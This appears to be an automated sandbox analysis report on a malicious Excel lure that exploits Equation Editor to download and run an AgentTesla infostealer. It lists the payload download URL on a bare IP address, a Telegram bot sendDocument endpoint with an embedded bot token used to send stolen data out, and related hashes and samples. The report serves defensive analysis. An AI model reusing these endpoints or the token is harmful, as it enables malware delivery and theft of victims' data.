Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading111	LSA Secrets	Virtualization/Sandbox Evasion131	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol23	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion131	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
New Order for April#89032.xlsx	31%	ReversingLabs	Document-Office.Exploit.MathType

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe	17%	ReversingLabs	Win32.Trojan.AgentTesla
C:\Users\Public\vbc.exe	17%	ReversingLabs	Win32.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138205		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://api.telegram.orgP	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://WrqCET.com	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://YiNu10TJVGgbJcx5.com	0%	Avira URL Cloud	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://198.23.174.104/hkn.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://198.23.174.104/hkn.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org	vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net03	vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://certificates.godaddy.com/repository/0	vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	false		high
https://dist.nuget.org/win-x86-commandline/latest/nuget.exe	vbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.dr	false		high
https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocumentdocument-----	vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp	false		high
https://github.com/d-haxton/HaxtonBot/archive/master.zip	vbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.dr	false		high
http://certs.godaddy.com/repository/1301	vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	false		high
https://api.telegram.orgP	vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.godaddy.com/gdig2s1-1823.crl0	vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	false		high
https://certs.godaddy.com/repository/0	vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	false		high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	false		high
http://crl.godaddy.com/gdroot-g2.crl0F	vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	false		high
https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/	vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp	false		high
http://WrqCET.com	vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmp	false		high
http://crl.godaddy.com/gdroot.crl0F	vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	false		high
http://www.%s.comPA	vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip	vbc.exe, vbc.exe.2.dr	false		high
https://YiNu10TJVGgbJcx5.com	vbc.exe, 00000005.00000002.2380811356.00000000025A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	false		high
http://certificates.godaddy.com/repository/gdig2.crt0	vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net0D	vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.2167842702.00000000023A1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp	false		high
https://secure.comodo.com/CPS0	vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	false		high
https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument	vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380230451.0000000000583000.00000004.00000020.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
198.23.174.104	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	383941
Start date:	08.04.2021
Start time:	12:49:04
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	New Order for April#89032.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@6/18@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 2.2% (good quality ratio 1.4%) Quality average: 40.5% Quality standard deviation: 31.2%
HCA Information:	Successful, ratio: 94% Number of executed functions: 72 Number of non-executed functions: 24
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:50:13	API Interceptor	54x Sleep call for process: EQNEDT32.EXE modified
12:50:15	API Interceptor	793x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
149.154.167.220	ORDER.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Scr.Malcodegdn30.6111.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.624.13772.exe	Get hash	malicious	Browse
	MUYR09080.exe	Get hash	malicious	Browse
	Revised Proforma.xlsx	Get hash	malicious	Browse
	Bellinger ordre.exe	Get hash	malicious	Browse
	QUATATION.exe	Get hash	malicious	Browse
	Purchase Order.exe	Get hash	malicious	Browse
	PO#.exe	Get hash	malicious	Browse
	OUR PO NO. CWI19150.exe	Get hash	malicious	Browse
	ORDER.exe	Get hash	malicious	Browse
	QUATATION.exe	Get hash	malicious	Browse
	28B2i9LyU8.exe	Get hash	malicious	Browse
	(PO #MT098233).exe	Get hash	malicious	Browse
	Pg788amGxu.exe	Get hash	malicious	Browse
	8oZswc8UuT.exe	Get hash	malicious	Browse
	Khay11iwV6.exe	Get hash	malicious	Browse
	vcoWaFYhyC.exe	Get hash	malicious	Browse
	Payment Proof.xlsx	Get hash	malicious	Browse
	QUATATION.exe	Get hash	malicious	Browse
198.23.174.104	Payment Proof.xlsx	Get hash	malicious	Browse	198.23.174.104/uxx/kuk.exe
	uIIHdM0MHt.rtf	Get hash	malicious	Browse	198.23.174.104/om.exe
	SWIFT_ADVISED 1802.xlsx	Get hash	malicious	Browse	198.23.174.104/bbbb/vmv.exe
	Purchase Order No 4462758.xlsx	Get hash	malicious	Browse	198.23.174.104/eemm/xax.exe
	Medical Equipment supply Tender.xlsx	Get hash	malicious	Browse	198.23.174.104/nonon/oko.exe
	SWIFT_ADVISED 1802.xlsx	Get hash	malicious	Browse	198.23.174.104/jmmj/ddd.exe
	NewOrder-PO#08337.xlsx	Get hash	malicious	Browse	198.23.174.104/benn/mym.exe
	New Order-PO08337.xlsx	Get hash	malicious	Browse	198.23.174.104/benn/mym.exe
	Order08388393.xlsx	Get hash	malicious	Browse	198.23.174.104/away/mmn.exe
	20210314$000469.xlsx	Get hash	malicious	Browse	198.23.174.104/laaal/lll.exe
	Drugs.xlsx	Get hash	malicious	Browse	198.23.174.104/wmmw/ooo.exe
	P O 65483939.xlsx	Get hash	malicious	Browse	198.23.174.104/avav/hrh.exe
	copia de pago_9485.xlsx	Get hash	malicious	Browse	198.23.174.104/ike/cox.exe
	Purchase Order Local_00000000089444.xlsx	Get hash	malicious	Browse	198.23.174.104/level/eve.exe
	P O 65483939.xlsx	Get hash	malicious	Browse	198.23.174.104/mori/ini.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.telegram.org	ORDER.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Scr.Malcodegdn30.6111.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.PackedNET.624.13772.exe	Get hash	malicious	Browse	149.154.167.220
	MUYR09080.exe	Get hash	malicious	Browse	149.154.167.220
	Revised Proforma.xlsx	Get hash	malicious	Browse	149.154.167.220
	Bellinger ordre.exe	Get hash	malicious	Browse	149.154.167.220
	QUATATION.exe	Get hash	malicious	Browse	149.154.167.220
	Purchase Order.exe	Get hash	malicious	Browse	149.154.167.220
	PO#.exe	Get hash	malicious	Browse	149.154.167.220
	OUR PO NO. CWI19150.exe	Get hash	malicious	Browse	149.154.167.220
	ORDER.exe	Get hash	malicious	Browse	149.154.167.220
	QUATATION.exe	Get hash	malicious	Browse	149.154.167.220
	28B2i9LyU8.exe	Get hash	malicious	Browse	149.154.167.220
	(PO #MT098233).exe	Get hash	malicious	Browse	149.154.167.220
	Pg788amGxu.exe	Get hash	malicious	Browse	149.154.167.220
	8oZswc8UuT.exe	Get hash	malicious	Browse	149.154.167.220
	Khay11iwV6.exe	Get hash	malicious	Browse	149.154.167.220
	vcoWaFYhyC.exe	Get hash	malicious	Browse	149.154.167.220
	Payment Proof.xlsx	Get hash	malicious	Browse	149.154.167.220
	QUATATION.exe	Get hash	malicious	Browse	149.154.167.220

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	ORDER.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Scr.Malcodegdn30.6111.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.PackedNET.624.13772.exe	Get hash	malicious	Browse	149.154.167.220
	MUYR09080.exe	Get hash	malicious	Browse	149.154.167.220
	Revised Proforma.xlsx	Get hash	malicious	Browse	149.154.167.220
	Bellinger ordre.exe	Get hash	malicious	Browse	149.154.167.220
	QUATATION.exe	Get hash	malicious	Browse	149.154.167.220
	Purchase Order.exe	Get hash	malicious	Browse	149.154.167.220
	PO#.exe	Get hash	malicious	Browse	149.154.167.220
	OUR PO NO. CWI19150.exe	Get hash	malicious	Browse	149.154.167.220
	ORDER.exe	Get hash	malicious	Browse	149.154.167.220
	QUATATION.exe	Get hash	malicious	Browse	149.154.167.220
	28B2i9LyU8.exe	Get hash	malicious	Browse	149.154.167.220
	rgdwRVPLVm.exe	Get hash	malicious	Browse	149.154.167.80
	(PO #MT098233).exe	Get hash	malicious	Browse	149.154.167.220
	Pg788amGxu.exe	Get hash	malicious	Browse	149.154.167.220
	8oZswc8UuT.exe	Get hash	malicious	Browse	149.154.167.220
	Khay11iwV6.exe	Get hash	malicious	Browse	149.154.167.220
	vcoWaFYhyC.exe	Get hash	malicious	Browse	149.154.167.220
	Payment Proof.xlsx	Get hash	malicious	Browse	149.154.167.220
AS-COLOCROSSINGUS	PO PR 111500976.xlsx	Get hash	malicious	Browse	198.23.213.61
	Revised Proforma.xlsx	Get hash	malicious	Browse	198.23.207.115
	7yTix20XaT.rtf	Get hash	malicious	Browse	198.23.251.121
	Inquiry.docx	Get hash	malicious	Browse	198.23.251.121
	order1562.docx	Get hash	malicious	Browse	198.23.251.121
	order1562.docx	Get hash	malicious	Browse	198.23.251.121
	lF5VYmf6Tm.exe	Get hash	malicious	Browse	192.3.26.107
	P.O_RFQ0098765434.xlsx	Get hash	malicious	Browse	198.46.132.132
	Payment Proof.xlsx	Get hash	malicious	Browse	198.23.174.104
	0f0mccRNrP.exe	Get hash	malicious	Browse	192.3.26.107
	R6G6EFOeOE.rtf	Get hash	malicious	Browse	198.23.251.121
	NEW ORDER PO.xlsx	Get hash	malicious	Browse	198.23.213.57
	uIIHdM0MHt.rtf	Get hash	malicious	Browse	198.23.174.104
	New purchase Order_Invoice payment info and shipping documents.docx	Get hash	malicious	Browse	198.23.251.121
	SecuriteInfo.com.Packed-GDKD3066D931944.20107.exe	Get hash	malicious	Browse	192.3.26.107
	SecuriteInfo.com.W32.AIDetect.malware1.1169.exe	Get hash	malicious	Browse	192.3.26.107
	4i1GUIgglX.exe	Get hash	malicious	Browse	192.210.198.12
	ACCOUNT SETTLED 32535365460.docx	Get hash	malicious	Browse	107.173.219.80
	ACCOUNT SETTLED 32535365460.docx	Get hash	malicious	Browse	107.173.219.80
	vm583573758.htm	Get hash	malicious	Browse	192.210.170.109

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
36f7277af969a6947a61ae0b815907a1	PAGO.xlsx	Get hash	malicious	Browse	149.154.167.220
	PRC-20-518 ORIGINAL.xlsx	Get hash	malicious	Browse	149.154.167.220
	invoice.xlsx	Get hash	malicious	Browse	149.154.167.220
	PR_A1191-04052021.xlsx	Get hash	malicious	Browse	149.154.167.220
	Quotation Zhejiang.xlsx	Get hash	malicious	Browse	149.154.167.220
	HL-57269806 TRMER.xlsx	Get hash	malicious	Browse	149.154.167.220
	Updated SOA.xlsx	Get hash	malicious	Browse	149.154.167.220
	RFQ_ V-21-Kiel-050-D02.xlsx	Get hash	malicious	Browse	149.154.167.220
	Statement of Account.xlsx	Get hash	malicious	Browse	149.154.167.220
	Shipping Documents.xlsx	Get hash	malicious	Browse	149.154.167.220
	Revised Proforma.xlsx	Get hash	malicious	Browse	149.154.167.220
	FARASIS.xlsx	Get hash	malicious	Browse	149.154.167.220
	Topresh_Sub2.xlsx	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.2221.rtf	Get hash	malicious	Browse	149.154.167.220
	Proforma Invoice 2.xlsx	Get hash	malicious	Browse	149.154.167.220
	MKDRPSJS9E999494993.xlsx	Get hash	malicious	Browse	149.154.167.220
	_ShipDoc_CI_PL_HBL_.xlsx	Get hash	malicious	Browse	149.154.167.220
	xpy9BhQR3t.xlsx	Get hash	malicious	Browse	149.154.167.220
	VSLS PARTICULARS.xlsx	Get hash	malicious	Browse	149.154.167.220
	PAYMENT ADVICE.xlsx	Get hash	malicious	Browse	149.154.167.220

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	881152
Entropy (8bit):	7.199964525474944
Encrypted:	false
SSDEEP:	12288:cSIIK2eESbfOEauXDylVOhrecPoFe/OIDIUSyBlt+vEHTwzZIKU6ke:cNIVUXXulVSBPo8OIDlJbzyI/
MD5:	5F968F612F82F74C96DD257793CF917D
SHA1:	004213F3E85514317B8A711EDC42A124BE378ADF
SHA-256:	2A0C31DCC49402D53D3907CBD0C79473E20B64AA098ADF71437946E58BD55299
SHA-512:	BAF41C5BC33A3349DFCF1B7A8978F002AB27A243A786BC80362132F757688AA366EE3A48A4CE071B39D9E9FDFAB04E5F204489D6BC23FEA7400CB5C9AABC2051
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Reputation:	low
IE Cache URL:	http://198.23.174.104/hkn.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.n`..............P.....F......fI... ...`....@.. ....................................@..................................I..O....`..,B........................................................................... ............... ..H............text...l)... ..................... ..`.rsrc...,B...`...D...,..............@..@.reloc...............p..............@..B................HI......H........?...H..........L................................................0............(....( .........(.....o!.........................("......(#......($......(%......(&....N..(....ol...('....&..((.....s)........s........s+........s,........s-............0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0...........~....o2....+...0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+...0......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2BCDEC9D.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33C3DEE4.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\346FC870.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Reputation:	moderate, very likely benign file
